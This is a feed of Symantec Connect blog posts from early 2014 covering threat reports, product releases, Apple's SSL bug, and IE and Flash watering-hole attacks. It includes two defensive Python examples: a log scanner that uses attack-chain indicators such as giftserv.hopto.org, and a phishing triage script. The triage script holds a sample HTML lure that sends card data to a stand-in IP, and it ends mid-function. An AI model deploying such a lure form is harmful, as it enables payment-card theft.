Channel: Symantec Connect - Blog Entries

Symantec Intelligence Report: January 2014


Welcome to the January edition of the Symantec Intelligence report. Symantec Intelligence aims to provide the latest analysis of cyber security threats, trends, and insights concerning malware, spam, and other potentially harmful business risks.

A number of large data breaches were reported during the month of January. The largest new data breach included the exposure of 105.8 million identities in South Korea. (It’s worth noting that many individuals in the country had more than one account exposed in this breach.) Another large data breach, previously reported as including 40 million identities, has since had its numbers adjusted upwards and is now estimated at 110 million identities exposed. These two breaches contribute significantly to bringing the total number of identities exposed to over 500 million for the last twelve months.

Targeted attacks are up to their highest level since August of last year, after what appears to be average-to-low attack numbers over the last four months. Manufacturing is the most targeted industry, making up 21.3 percent of attacks. The non-traditional services category, which includes hospitality, recreation, and repair, is a close second at 20.6 percent.

The number of vulnerabilities reported is also up in January after lower numbers reported in November and December of last year. However, at 555 vulnerabilities, this number is still well below October, which reported a high of 663 for the month.

In other news, spam and phishing rates are down slightly in January, while email virus rates are at their lowest levels since October of last year.

We hope you enjoy the January Symantec Intelligence Report. You can download your copy here.


Import tapes into tape library using NetBackup 6.5.6


Hi Gurus, I will need to perform a restore on a different NetBackup environment and restore the data there.

How can I import the tapes to the tape library? Do I need to check them into the library as regular tapes and then import them into the catalog?

Thanks for your input.

 

Top 5 Reasons Companies Need Mobile Application Management


Cheryl Tang, Senior Product Manager, Symantec Corp. illustrates why Mobile Application Management is vital to securing the future of "anywhere" business.

Changing The Shape Of Security For Business In The Future


How will enterprise security change in the next several years? With so many new devices, attacks and vulnerabilities, how will we keep up in the future?

Latest Symantec Endpoint Protection Released 12.1.4a and 11.0.7.4a


Hello,

Symantec Endpoint Protection 12.1.4a and 11.0.7.4a were released on Feb 13, 2014.

The build version is 12.1.4023.4080.

SEP released version details are available here: https://www-secure.symantec.com/connect/articles/what-are-symantec-endpoint-protection-sep-versions-released-officially

Download Symantec Endpoint Protection 12.1.4a and 11.0.7.4a here:

https://symantec.flexnetoperations.com/control/symc/registeranonymouslicensetoken

SEP 12.1 Enterprise Edition: (screenshot of the download entry)

For Small Business Customer 12.1: (screenshot of the download entry)

SEP 11 RU7 MP4a: (screenshot of the download entry)

This release is specific to the SEPM. Only Part1.exe and SEPM.exe are available to download.

Part2.exe is not available to download.

Even in Part1.exe, only the SEPM is at the latest version (12.1.4023.4080); the SEP client packages it contains are still the 12.1.4013.4013 (RU4) packages.

This update to Symantec Endpoint Protection Manager contains remediation for the vulnerabilities listed in Symantec Security Response Advisory SYM14-004. This update applies only to the manager, not to clients, and is designed to update any version of Symantec Endpoint Protection Manager. Symantec recommends that all Symantec Endpoint Protection and Network Access Control customers upgrade to this release of Symantec Endpoint Protection Manager.
   
For detailed information about this release, read the Knowledge Base article SYM14-004 Symantec Endpoint Protection Management Vulnerabilities.

Supported upgrade path:

SEPM 11 RU7 MP4a can be installed over any previous version of SEPM 11, and SEPM 12.1 RU4a can be installed over any previous version of SEPM 11 or 12.1, including SEPM 11 RU7 MP4a.

This release is specific to Endpoint Protection Manager, and no updates are available for SEP clients.

Fix notes and fix IDs are not yet available in the following KBs:

http://www.symantec.com/docs/TECH103087

http://www.symantec.com/docs/TECH163829

Register here to receive product alert notifications:

http://www.symantec.com/docs/TECH105781

See the official Symantec blog as well: https://www-secure.symantec.com/connect/blogs/security-advisory-symantec-endpoint-protection-management-vulnerabi

 

The Very Best Enterprise Vault Outlook Add-in Version


A question which is often asked on the Connect Forums is:

"Which is the best Enterprise Vault Outlook Add-in Version?"

 

That's actually an interesting question. For me the answer lies in the 'big change' that took place in Enterprise Vault 10.0.2.  Taken from the release notes we see:

Single Outlook Add-In installer for all supported languages [Ref 13446, 13729]

In Enterprise Vault 10.0.1 and earlier, there was a separate Outlook Add-In installer for each language that the Outlook Add-In supported.

In Enterprise Vault 10.0.2 and later, there is a single installer for all supported languages. The installer kit (Symantec Enterprise Vault Outlook Add-in.msi) is in the folder Symantec Enterprise Vault\Outlook Add-In on the Enterprise Vault distribution media.

The display language that the Outlook Add-In uses is based on the Microsoft Office and Windows language settings. The Outlook Add-In uses the Office language, if it is supported. Otherwise, it uses the Windows language. If the Outlook Add-In does not support either language, it uses English.

It is possible to configure Office to use one language for the user interface and another language for the help. In this case, the Outlook Add-In considers each of these languages separately and, if necessary, uses the Windows language or English.

So for me any version of the Outlook Add-in 10.0.2 or higher is a good one to pick, because it's much simpler in terms of deployment and manageability.

 

New Flash Zero-Day Linked to Yet More Watering Hole Attacks


Watering hole attacks using zero-day vulnerabilities are becoming more common. Last week we announced an Internet Explorer 10 zero-day being used in a watering hole attack, and today, just one week later, we have an Adobe Flash zero-day, the Adobe Flash Player and AIR CVE-2014-0502 Remote Code Execution Vulnerability (CVE-2014-0502), also being used in a watering hole attack. This new attack has been dubbed “Operation GreedyWonk” in various media and is reported to be targeting the websites of three non-profit institutions. Symantec telemetry shows even more sites being targeted in this watering hole attack using this new zero-day.
 


Figure 1. Watering hole attack using Adobe Flash 0-day
 

Anatomy of the attack

This attack technique is known as a watering hole attack. In this case, the target visits a compromised website that contains an IFrame inserted by the attackers in order to redirect the target to another website (giftserv.hopto.org). This new site loads a malicious index.php file (Trojan.Malscript) which checks whether the victim is running a 32-bit or 64-bit system. Depending on the result, a malicious index.html file (also Trojan.Malscript) and additional components are downloaded from either the 32-bit or 64-bit folder hosted on the attacker’s server. The malicious index.html file then loads the cc.swf Adobe Flash file (Trojan.Swifi) containing the zero-day. Once exploited, a logo.gif image file is downloaded containing encrypted shellcode, which downloads and executes the malicious server.exe (Backdoor.Jolob) payload.
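To show what the chain above looks like from the defender's side, here is an added example (not Symantec's code or tooling) that reconstructs the redirect chain per client from web proxy logs and rates the result. The log format and the sample lines are constructed for the example; only the redirect host giftserv.hopto.org and the file names come from the post.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Stages of the redirect chain in the order the post describes them:
# loader script -> per-architecture page -> Flash exploit -> shellcode image -> payload.
CHAIN_STAGES = (
    ("loader", re.compile(r"/index\.php$")),
    ("arch_page", re.compile(r"/(?:32|64)/index\.html$")),
    ("flash_exploit", re.compile(r"/cc\.swf$")),
    ("shellcode_image", re.compile(r"/logo\.gif$")),
    ("payload", re.compile(r"/server\.exe$")),
)

# Constructed log format for this example (not a real proxy's format):
#   <timestamp> <client_ip> <method> <url> <status> <referer or ->
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+)$")


def parse_line(line):
    """Parse one log line into a dict, or return None for a malformed line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status, referer = m.groups()
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "referer": None if referer == "-" else referer}


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def match_stage(url):
    """Return the index of the chain stage whose file name this URL matches, or None."""
    path = urlparse(url).path
    for i, (_, pattern) in enumerate(CHAIN_STAGES):
        if pattern.search(path):
            return i
    return None


def find_chains(lines, min_stages=2):
    """Group stage hits by (client, host) and report hosts that served the chain.

    A pair is reported when at least `min_stages` distinct stages were requested
    from that host in the chain's order. The finding records the stages, the
    referring site on the first stage (the page carrying the injected IFrame)
    and whether the payload came back with HTTP 200.
    """
    buckets = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        stage = match_stage(rec["url"])
        if stage is not None:
            buckets[(rec["client"], host_of(rec["url"]))].append((rec["ts"], stage, rec))

    findings = []
    for (client, host), hits in buckets.items():
        hits.sort(key=lambda h: h[0])
        seen, last = [], -1
        entry_site, payload_fetched = None, False
        for _, stage, rec in hits:
            if stage <= last:          # out-of-order or repeated stage: ignore
                continue
            seen.append(CHAIN_STAGES[stage][0])
            last = stage
            if stage == 0 and rec["referer"] and host_of(rec["referer"]) != host:
                entry_site = host_of(rec["referer"])
            if stage == len(CHAIN_STAGES) - 1 and rec["status"] == 200:
                payload_fetched = True
        if len(seen) >= min_stages:
            findings.append({"client": client, "host": host, "stages": seen,
                             "entry_site": entry_site, "payload_fetched": payload_fetched,
                             "severity": "high" if payload_fetched else "medium"})
    return findings


# Constructed sample: one full chain, one benign logo.gif, one chain that stopped early.
SAMPLE_LOG = """\
2014-02-20T10:00:01 10.1.2.3 GET http://www.example.org/news.html 200 -
2014-02-20T10:00:02 10.1.2.3 GET http://giftserv.hopto.org/index.php 200 http://www.example.org/news.html
2014-02-20T10:00:03 10.1.2.3 GET http://giftserv.hopto.org/32/index.html 200 http://giftserv.hopto.org/index.php
2014-02-20T10:00:04 10.1.2.3 GET http://giftserv.hopto.org/32/cc.swf 200 http://giftserv.hopto.org/32/index.html
2014-02-20T10:00:05 10.1.2.3 GET http://giftserv.hopto.org/32/logo.gif 200 -
2014-02-20T10:00:06 10.1.2.3 GET http://giftserv.hopto.org/32/server.exe 200 -
2014-02-20T10:05:00 10.1.2.4 GET http://cdn.example.net/site/logo.gif 200 http://cdn.example.net/
2014-02-20T10:06:00 10.1.2.5 GET http://giftserv.hopto.org/index.php 200 http://www.example.org/news.html
2014-02-20T10:06:01 10.1.2.5 GET http://giftserv.hopto.org/64/index.html 404 http://giftserv.hopto.org/index.php
this line is malformed and must be skipped
"""


def scan_sample():
    return find_chains(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f['severity']:6} {f['client']} -> {f['host']} via {f['entry_site']}: "
              + " > ".join(f["stages"]))
```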
 

How can I prevent and mitigate against this attack?

Symantec recommends users update their Adobe product installations to the latest versions to address this critical vulnerability. Details of how to upgrade software are available in an Adobe Security Bulletin.

Symantec customers are protected from this zero-day attack with the following detections:

Antivirus

Intrusion Prevention Signatures

As always, we also advise customers to use the latest Symantec technologies and incorporate the latest Symantec consumer and enterprise solutions to best protect against attacks of any kind.
 

Watering hole attacks remain popular

This latest watering hole attack demonstrates that it remains a popular technique for attackers to target individuals of interest. The use of yet another zero-day indicates that the arsenal available to attackers shows no signs of depletion. Multiple websites have been identified using this Adobe Flash zero-day, all with different payloads being delivered. This may be the result of this particular zero-day being sold to a number of different attackers, or possibly of it being used by a single attacker in multiple campaigns. Symantec continues to investigate this attack to ensure that the best possible protection is in place.
 


Figure 2. Anatomy of a watering hole attack

What’s New for Our Partners? A Redesigned Symantec Partner Program Coming Soon


By Garrett Jones, Vice President of Global Channel Operations

I had a great time at last week’s Symantec Partner Engage event in Budapest visiting with more than 300 of our top partners from across the EMEA region.  In addition to sharing more about our company’s strategy and vision, it was also exciting to share the details around our redesigned Partner Program framework.  Built on Symantec’s Global Channel Strategy announced in November, the new Partner Program will better support the way our partners do business by fostering stronger partnerships that enable growth and delivering differentiated value to our customers. 

As we consider the breadth of our portfolio, we need partners who are focused on each type of customer across all levels of complexity.  We need partners that understand and can solve the needs of an SMB just as much as we need partners with deep relationships in the enterprise space to help with more complex solutions. The new Partner Program addresses these needs and is designed to reward for growth in areas where partners are most capable.

As a part of the redesign, we are introducing Symantec Competencies, an enablement framework that builds upon partners’ existing capabilities to deliver a better customer experience through deeper expertise in areas of focus that are aligned to our solutions.  How does this work? Partners will build the capabilities required to sell and implement our solutions, and once partners have obtained the capabilities for a given competency, many of the benefits defined in the program become available.  As partners meet certain performance standards, the benefits increase, and partners will earn very compelling rewards for growing their business and delivering exceptional value to customers.  The competencies are the foundation of the program, and they underpin the program design principles of being customer focused, performance based and more rewarding for our most committed partners.

What else is different about the redesigned Partner Program?  With the new Partner Program, we will spend more on financial benefits for the channel than ever before.  The program design concentrates the investments more selectively with our top performing partners. We’ve enhanced our Opportunity Registration program and added a performance rebate for growth.  We will also offer development funds so we can invest in our partners as they have invested in us.  

We’re also enhancing our non-financial benefits to help our partners grow their business and advance customers through the sales cycle.  One of the new benefits will be access to the same market intelligence that we use for internal business planning, so we can align our execution with our partners on the same market data and grow together.  We will also increase our consulting and technical support benefits and offer more online learning opportunities.

Following the EMEA Partner Engage event, Roger Bär, chief executive officer of Comsoft, shared his enthusiasm with us by stating, “We have maintained a close partnership with Symantec for many years. With their forthcoming redesigned Partner Program, we look forward to the many benefits that will help us secure more business opportunities and position us for success.”

Additionally, Savitha Bhaskar, general manager of Condo Protego shared, “Symantec’s new competency framework will help to distinguish us against our competitors as it reflects a clear understanding of our ability to deliver value and satisfaction.”

We will share more details later this year when we get closer to the official launch.  We are being very thoughtful with regards to how partners will transition to the new program and how we recognize our partners’ current investments. As such, we’ve designed a transition period in which current membership status and associated benefits will be maintained throughout the transition.  

We built this program by collaborating with partners and adjusting our approach based on the feedback along the way.  Our approach will continue to be iterative and evolve to ensure the program provides value and meets the needs and expectations of our partners. Look for more information in the coming months.  

 

 


Project updates as February draws to a close


As February is drawing to a close I thought I'd review the progress made this month on a few projects and report on some checks to be done.

First, let's look back at what I set out to do in February [1]. I am almost there :D:

  • A wrap-up for aila2-version 1 containing a couple of installation files and the toolkit in a single zip --> _DONE_
  • A gauge control for Patch Compliance Trending to provide global compliance status at a glance --> _DONE_
  • A toolkit to link multiple Patch Trending sites to provide a global view for large environments <-- _NOT_DONE_
  • A Managed Delivery execution reporting toolkit, to display software execution over time --> _DONE_

I am also still working on the aila2 new features [2], with HTTP return code stats done and hit count per IP address done (not in the original plan, but needed). I still need to make good on the filtering additions, and I would like to add detailed accounting for TaskManagement and InventoryRuleManagement.

Finally, I have added a few messages exchanged with phoward74, who is having some issues using Patch Trending on 7.5.

The tool itself works fine from the CLI (using an elevated prompt); however, it doesn't manage to find the trending table when run from the server via a task or via the agent itself!

So I need to verify whether the trending toolkit can work on 7.5 (the tool itself is okay, but the SMP integrations have to be validated again).

[1] A note on things to come

[2] {CWoC} aila2-version1 sources files

[3] Adding Patch Trending to Your Symantec Management Platform Step by Step Guide

Proposed NetBackup Vision Breakout Sessions


Trying to figure out which breakout session for NetBackup sounds most interesting to other NetBackup users.  Please indicate by answering the poll on the right. Thank you!

The Tenth Anniversary of Mobile Malware

Figure. A brief history of mobile malware
 
2014 marks the tenth anniversary of mobile malware. It all began in 2004, when the first variant of SymbOS.Cabir was submitted to security researchers. The analysis revealed that this worm targeted Symbian OS, which was a very popular mobile operating system at the time. Infected phones would search for nearby Bluetooth devices that had activated discovery mode and then the worm would try to push itself onto them. The user had to manually accept the file transfer and also had to agree to the worm’s installation before the malware could infect the device. This limited the spread of the worm, as the victim had to be in close proximity to devices and needed to interact with the worm. But this was only the beginning. Several variants of Cabir appeared in the wild with different modifications. Some variants stole data, such as phonebook details, and other samples acted as a classic virus and infected local files. 
 
A few months later, a cracked version of a game called Mosquito appeared on the Internet. Along with the popular game, the package contained Trojan.Mos, which would send premium text messages in the background. This was the first widely seen case of mobile malware with a focus on monetary profit. Today, the same tactic is used in hundreds of Trojanized Android games, which send expensive text messages after installation. Soon after Mosquito, the first versions of Skull appeared. The threat was named after its main payload, as the malware replaced the icons of most applications with an image of a skull. It also replaced system and application files with garbage, disabling their functionality and rendering the phone nearly unusable. Luckily, at that time ransomware was not yet popular, or else we probably would have seen the malware trying to hold the user’s data or the mobile device itself hostage. This changed in 2013 when we saw the first ransomware samples hitting mobile devices. These threats focus more on holding the phone hostage instead of the data, as frequent device synchronization and automatic data uploads to the cloud give users better backup coverage.
 
In 2005, SymbOS.CommWarrior.A entered the scene. It extended the propagation vector to include sending MMS messages to various numbers in the contacts book. This malware was very successful and CommWarrior variants have been floating around mobile phone networks for years. In 2006, Trojan.RedBrowser.A extended threats that send premium text messages to other operating systems. This was the first Trojan for J2ME that could infect different mobile phone platforms.
 
Within a year, mobile devices had to deal with malware that was similar to established malware on desktop computers, including worms, data-stealing and profit-making Trojans, and viruses that infect other files. If this wasn’t enough, the rise of adware and spyware did not bypass mobile phones. The commercial Spyware.FlyxiSpy, which was released in 2006, was very successful at monitoring all of the compromised mobile device’s activity. The malware was advertised as the best solution for people who wanted to spy on their spouses. Similar threats followed and evolved further, allowing the user’s every step to be tracked.
 
With many online banks moving to out-of-band SMS transaction verification methods, the criminals had to follow as well. As a result, in 2010, attackers introduced SymbOS.ZeusMitmo, a threat that was capable of forwarding bank account transaction text messages from the compromised mobile device to the attackers. This allowed attackers to continue to commit online banking fraud. The idea was so successful that soon, mobile malware targeting online banking services appeared for all the major phone operating systems except iOS.
 
When Android became the biggest mobile phone platform in 2011, malware authors began to take notice. The attackers’ distribution vector of choice is through Trojanized applications and they use some social engineering techniques to make them more palatable. For example, Android.Geinimi was an early, successful bot for mobile devices disguised as a useful app. Mobile botnets have since become popular and are often used for click-fraud and premium text message scams.
 
Android.Rootcager arrived in the same year and was the first Android threat to use an exploit to elevate its privileges. This also marks one of the few differences between mobile malware and desktop computer threats. On Windows computers, we often see malware that uses an exploit to install itself on the compromised computer. In fact, drive-by-download infections from malicious websites have become the top infection vector. However, on mobile phones, drive-by-downloads happen very rarely. Most of the time, users still have to be tricked into installing the application themselves. It’s not that there are no vulnerabilities for mobile operating systems — there are actually quite a few, it’s just that attackers have not found it necessary to use them yet. In 2010, an iPhone jailbreak website demonstrated how this form of attack could work. The site took advantage of a PDF font-parsing vulnerability to install custom software on the fly. Since then, all mobile phone operating systems have upgraded their security, making it harder for malware to misuse vulnerabilities.
 
In the last two years, we have seen major growth from Trojans and adware targeting mobile devices, mainly focusing on Android phones. Even targeted attacks now make use of mobile threats for spying purposes. Considering this boom, mobile malware has become a real threat that needs greater attention because it isn’t over yet. In fact, we are likely to see the next evolution of mobile threats soon, especially as mobile phones become identification tokens and payment solutions in the future. 
 
Symantec recommends that users remain vigilant when installing applications from any unknown sources. Use strong passwords to protect your device and services. Symantec offers various security products for mobile devices that block these threats and we are constantly working on delivering the next level of protection.

The Future of Mobile Malware

This year's Mobile World Congress is being held from February 24 to 27. The latest smartphone and tablet technologies are gathered in one place, and they will likely appear before us within the coming year. But just as mobile device makers and app developers compete on technology every year, malware authors are also honing their skills. In 2013, Symantec discovered an average of 272 new variants of malware targeting the Android mobile operating system per month, and an average of five new malware families. These threats target mobile devices in a variety of ways, attempting to steal personal information and data such as bank account and credit card details, track users, send premium SMS messages, and display persistent adware. The notable threats confirmed so far may be the forerunners of new types of mobile malware.

Android malware goes after your wallet more boldly
More and more users are using smartphones and tablets for online banking and shopping. According to a recent Pew Research survey, 51% of US adults bank online, and 35% use a mobile phone for online banking. Younger generations tend to use mobile banking at higher rates, so adoption will only grow over time.

Alongside online banking apps, mobile devices also take part in two-factor authentication (2FA) processes. When a user attempts to log in to an online bank account on a PC, a code is sent to the mobile device, and the user's identity is confirmed only once that code is entered on the online banking site.

Attackers who understand this scheme have developed Android malware that steals 2FA codes; malware such as Android.Hesperbot and Android.Perkel intercepts the SMS messages containing the 2FA codes and sends them directly to the attacker. It also steals other online banking user information and, in combination with other PC-based malware, breaks into the victim's account.

Given the growing popularity of the mobile wallet concept, this kind of malware may increase in the coming years. Using mobile devices for purchases in physical stores is not yet mainstream, but it is only a matter of time before attackers turn their attention to it.

Enhanced stealth: Android bootkits
Bootkits are used in advanced threats that mainly target Windows computers. They operate deep within the operating system, usually infecting the computer's boot code such as the master boot record, which allows the malware to run before the operating system itself starts. By using this form of threat, attackers can remain hidden on a compromised computer for long periods and keep particular processes from being detected. Because the threat's components are then shielded by rootkits and other stealth features, bootkits can be troublesome and difficult to deal with. Symantec Power Eraser, Norton Power Eraser and the Norton Bootable Recovery Tool from Symantec can be used to remove this type of threat from a computer.

A recently discovered bootkit (detected as Android.Gooboot) has been found to target Android devices. Android.Gooboot rewrites the boot partition and boot scripts of an Android device so that it can launch while the operating system is starting. This bootkit is particularly hard to remove, but to infect a device in the first place the attacker must have physical access to it. Android.Gooboot also carries no exploit code and has no ability to escalate privileges. That said, attackers are becoming ever bolder in their attempts to infect smartphones, so this does seem to indicate a future trend in the Android malware landscape. For now, be cautious when purchasing a rooted phone.

New routes into mobile devices
Android malware typically tricks users into installing malicious apps from the Android market. However, as app review becomes stricter, it has become harder than before for attackers to get malicious apps into the Android market. Instead, attackers have started trying to reach Android devices via the PC, giving rise to hybrid threats.

A recent threat that Symantec detects as Trojan.Droidpak first compromises a Windows computer and ultimately downloads a malicious Android application package (APK) to the compromised computer. When the user connects an Android device to this computer, the Trojan attempts to install the malicious APK (detected as Android.Fakebank.B) onto the Android device. If the installation succeeds, the APK looks for specific Korean online banking apps and tries to lure the user into installing malicious versions of them.

To avoid this threat, take care not to connect mobile devices to untrusted PCs, and be sure to install security software on both the PC and the mobile device.

Of course, the PC is not the only route exploited by hybrid threats. With the Internet of Things becoming a reality, we expect to see threats that use mobile devices to try to infect home automation systems, or the other way around.

Mobile malware keeps growing
Mobile malware continues to evolve. It often takes its cues from the history of Windows malware and always stays alert to the latest technology trends. The growing skill of Android malware authors is evident from the emergence of advanced techniques such as bootkits. As with PC-targeted cybercrime, most attackers are motivated by financial theft. As mobile payment technologies spread, mobile devices will become an even more attractive target for attackers. The more we depend on mobile devices for personal computing, the more essential it becomes to protect them. Use reputable security software such as Norton Mobile Security to protect your mobile device from a wide range of threats.

 

* To subscribe to the RSS feed of the Japanese-language Security Response blog, go to http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja.

Apple's SSL bug in iOS and OS X - CVE-2014-1266


Apple has released iOS 7.0.6 as a security update; the details are as follows:

---------

Available for: iPhone 4 and later, iPod touch (5th generation), iPad 2 and later

Impact: An attacker with a privileged network position may capture or modify data in sessions protected by SSL/TLS

Description: Secure Transport failed to validate the authenticity of the connection. This issue was addressed by restoring missing validation steps.

CVE-ID: CVE-2014-1266

The SSLVerifySignedServerKeyExchange function in libsecurity_ssl/lib/sslKeyExchange.c in the Secure Transport feature in the Data Security component in Apple iOS 6.x before 6.1.6 and 7.x before 7.0.6, Apple TV 6.x before 6.0.2, and Apple OS X 10.9.x before 10.9.2 does not check the signature in a TLS Server Key Exchange message, which allows man-in-the-middle attackers to spoof SSL servers by using an arbitrary private key for the signing step or omitting the signing step.

Source: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1266

-----------

The released security update fixes a bug in the SSL implementation on iOS that would allow man-in-the-middle attackers to intercept SSL data. Affected versions include iOS up to version 7.0.5 and OS X before 10.9.2. Apple has already issued a fix for iOS in version 7.0.6, and according to Apple a similar fix for OS X should be expected shortly.

 

Current recommendations for iOS version 7.0.5 or older:

- update to version 7.0.6 immediately (perform the update over a trusted connection)

 

Current recommendations for OS X versions older than 10.9.2 include:

- use an alternate browser: currently Firefox and Chrome have been deemed safe from this bug, as they use their own SSL/TLS libraries

- avoid using public and unsecured networks (especially WiFi networks)

- as soon as Apple releases the fix for OS X, apply the patch to the affected versions of the software to remediate

- AV or IPS protection is not feasible for this issue

 

References:

About the security content of iOS 7.0.6
http://support.apple.com/kb/HT6147

Anatomy of a "goto fail" - Apple's SSL bug explained, plus an unofficial patch for OS X!
http://nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-goto-fail-apples-ssl-bug-explained-plus-an-unofficial-patch/

Apple security update fixes iOS vulnerability
http://news.cnet.com/8301-13579_3-57619299-37/apple-security-update-fixes-ios-vulnerability/

Urgent iPhone and iPad security update, Mac OS X pending
http://www.welivesecurity.com/2014/02/22/urgent-iphone-and-ipad-security-update-mac-os-x-pending

Protect your Mac from SSL bug
http://reviews.cnet.com/8301-13727_7-57619382-263/protect-your-mac-from-ssl-bug/

 

Internet Explorer 10 Zero-Day Vulnerability Exploited in Widespread Drive-by Downloads


Earlier this month we blogged about a new Internet Explorer 10 zero-day vulnerability that was targeted in a recent watering hole attack. The attackers took advantage of a previously undiscovered zero-day flaw known as the Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability (CVE-2014-0322). At the time, the attackers delivered the exploit code for the zero-day vulnerability through compromised sites, intending to target a limited audience. Since then, we have continued to closely monitor attacks focusing on CVE-2014-0322. We’ve observed trends suggesting that attacks targeting this vulnerability are no longer confined to advanced persistent threats (APT) — the zero-day attacks are expanding to attack average Internet users as well. We refer to these attacks as drive-by downloads. This is not a surprising result, as the vulnerability’s exploit code received a lot of exposure, allowing anyone to acquire the code and re-use it for their own purposes.

Our internal telemetry shows a big uptick in attempted zero-day attacks. The attacks started to increase dramatically from February 22, targeting users in many parts of the world.  Our telemetry shows both targeted attacks and drive-by downloads in the mix.


Figure 1. Attacks targeting CVE-2014-0322 around the world

Users visiting Japanese sites have been particularly targeted.  This is mainly because multiple sites were compromised to host the drive-by download. The following sites were compromised in these attacks.

  • A community site for mountain hikers
  • An adult dating service site
  • A website promoting language education
  • A website providing financial market information
  • An online shopping site
  • A website of a Japanese tour provider

We believe that the same attacker undertook the majority of the attacks, based on the file components used.


Figure 2. Computers targeted with CVE-2014-0322 exploit code by region

These websites either were modified to host the exploit code for the Internet Explorer zero-day vulnerability or were updated with the insertion of an iframe that redirects the browser to another compromised site hosting the exploit code. If the attack is successful, the exploit drops a banking Trojan that steals login details from certain banks. Symantec detects this threat as Infostealer.Bankeiya.

Figure 3. Fake login screen for Mizuho Bank asking for a PIN

How to stay protected from the attacks

Microsoft has yet to provide a security update to patch the affected vulnerability. However, the company has offered the following solutions to help users protect their computers from exploits that take advantage of this vulnerability:

Symantec also encourages users to apply all relevant patches when they are available. Symantec protects customers against this attack with the following detections:

Antivirus

Intrusion Prevention Signatures

We will likely continue to see an uptick in attacks exploiting this vulnerability, so we urge everyone to take action immediately.

Hot Off The Press - Office 2013 Service Pack 1


Useful information for all Enterprise Vault administrators out there is that Microsoft have released Office 2013 Service Pack 1:

http://www.microsoft.com/en-us/download/details.aspx?id=42017, 32 bit

http://www.microsoft.com/en-us/download/details.aspx?id=42006, 64 bit

The updates are a whopping 643 MB and 774 MB respectively.

Why is this important to Enterprise Vault Administrators?  Well, it is something that can of course be tested with the Enterprise Vault Outlook Add-in, but 'we' should all wait until Symantec have given the 'nod of approval' before going ahead and installing it in a production environment.  There might be as yet unforeseen issues with the Enterprise Vault Outlook Add-in and the service pack.

I'd be interested to know, though, if anyone has any feedback; please let me know.


Vision 2014 Conference Topics for NetBackup

Tell us what interests you!

Greetings NetBackup professionals! The NetBackup product team is actively planning for our biggest Vision conference ever. In addition to participating in over 100 training sessions and hands-on labs, conference attendees will be able to hear the latest on the future direction of NetBackup, connect with the thought leaders and subject matter experts who drive our data protection technologies, and network with their peers to learn how they are using NetBackup to protect their information.

We’d like your help to make sure the educational experience is exactly what you’re looking for. We’ve put together a quick survey of possible NetBackup topics we may cover at the conference. Please share your opinions with us and let us know which of these topics interests you:

Click here to fill out our Vision NetBackup topic survey

 

Symantec Vision 2014 Conference Details:

Where: Caesars Palace, Las Vegas
When: Monday, May 5 through Thursday, May 8
Register: http://www.symantec.com/vision/

Catalog backups to lower version Media Servers - Not Always any Error!

7.5 Master Catalog backed up to a 6.x Media Server - A word of warning!

My experience of an easy oversight during a staged upgrade and a word of warning for users whose Catalog backup may look OK but may be of no use!

How to Protect Against Small Business Tax Scams


Over the next few weeks, 23 million small businesses will file their taxes.[1]  While many of these companies are investing time and money to identify their 2013 tax deductions,  most don’t realize that small businesses like theirs are being identified as online targets—an oversight that could result in devastating financial loss for their business.  And at tax time, small businesses are especially lucrative targets for cybercriminals, particularly in the BYOD era where work and personal data is accessed on the same device, including bank records and sensitive emails.

In today’s interconnected world, organized crime syndicates use a variety of tax-themed scams designed to lure victims and steal financial information. For example, Symantec has detected a rise in tax-season-specific phishing scams, that is, attempts to steal sensitive information such as usernames, passwords, or credit card details by impersonating a trustworthy source such as a bank or a tax authority.

Cybercriminals are also sending fake emails this season with HTML attachments that, when opened in the browser, present a fake form that captures whatever personal data is entered and sends it to an attacker-controlled server. This is damaging to small business owners and their employees alike, because both business and personal information is compromised at once. Below is a screenshot of one such HTML phishing lure, impersonating HMRC (Her Majesty’s Revenue and Customs, the UK tax office):

[Screenshot: HMRC-themed HTML phishing attachment]
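A triage script for the HTML-attachment lure described above, added here as an example and not code from the original post. It parses a constructed sample message (the sender, subject and URLs are invented), extracts HTML attachments and flags any form that posts password or payment fields to an absolute external URL. That combination is the tell-tale shape of a credential-harvesting attachment: a form opened from a local file has nowhere to send data unless its action points at a server the attacker controls.

```python
"""Triage an email for HTML attachments that behave as credential-harvesting forms."""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message modelled on the tax-themed HTML attachment lure
# described in the post; sender, subject and URLs are invented for this example.
SAMPLE_EML = b"""\
From: "HM Revenue & Customs" <refund@hmrc-gateway.example>
To: owner@smallbiz.example
Subject: Tax Refund Notification
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain

Please open the attached form to claim your refund.

--XYZ
Content-Type: text/html; name="refund_form.html"
Content-Disposition: attachment; filename="refund_form.html"

<html><body>
<form method="post" action="http://203.0.113.77/collect.php">
  Card number <input name="cardnumber">
  Expiry <input name="expiry">
  CVV <input name="cvv" type="password">
  <input type="submit" value="Claim refund">
</form>
</body></html>
--XYZ--
"""

# Field names that indicate credentials or payment data are being requested.
SENSITIVE_FIELDS = {"password", "passwd", "pin", "cvv", "cvc", "cardnumber",
                    "card", "ssn", "account", "sortcode", "routing"}


class FormCollector(HTMLParser):
    """Record every <form> action and the input names each form contains."""

    def __init__(self):
        super().__init__()
        self.forms = []  # each entry: {"action": str, "fields": [input names]}

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "fields": []})
        elif tag == "input" and self.forms:
            name = a.get("name", "").lower()
            if name:
                self.forms[-1]["fields"].append(name)


def suspicious_forms(html_text):
    """Return forms that submit to an absolute external URL and ask for
    credential or payment fields. Both signals are required: a relative action
    cannot exfiltrate from a file opened locally, and an external form with no
    sensitive inputs (a search box, say) is usually benign."""
    parser = FormCollector()
    parser.feed(html_text)
    hits = []
    for form in parser.forms:
        target = urlparse(form["action"])
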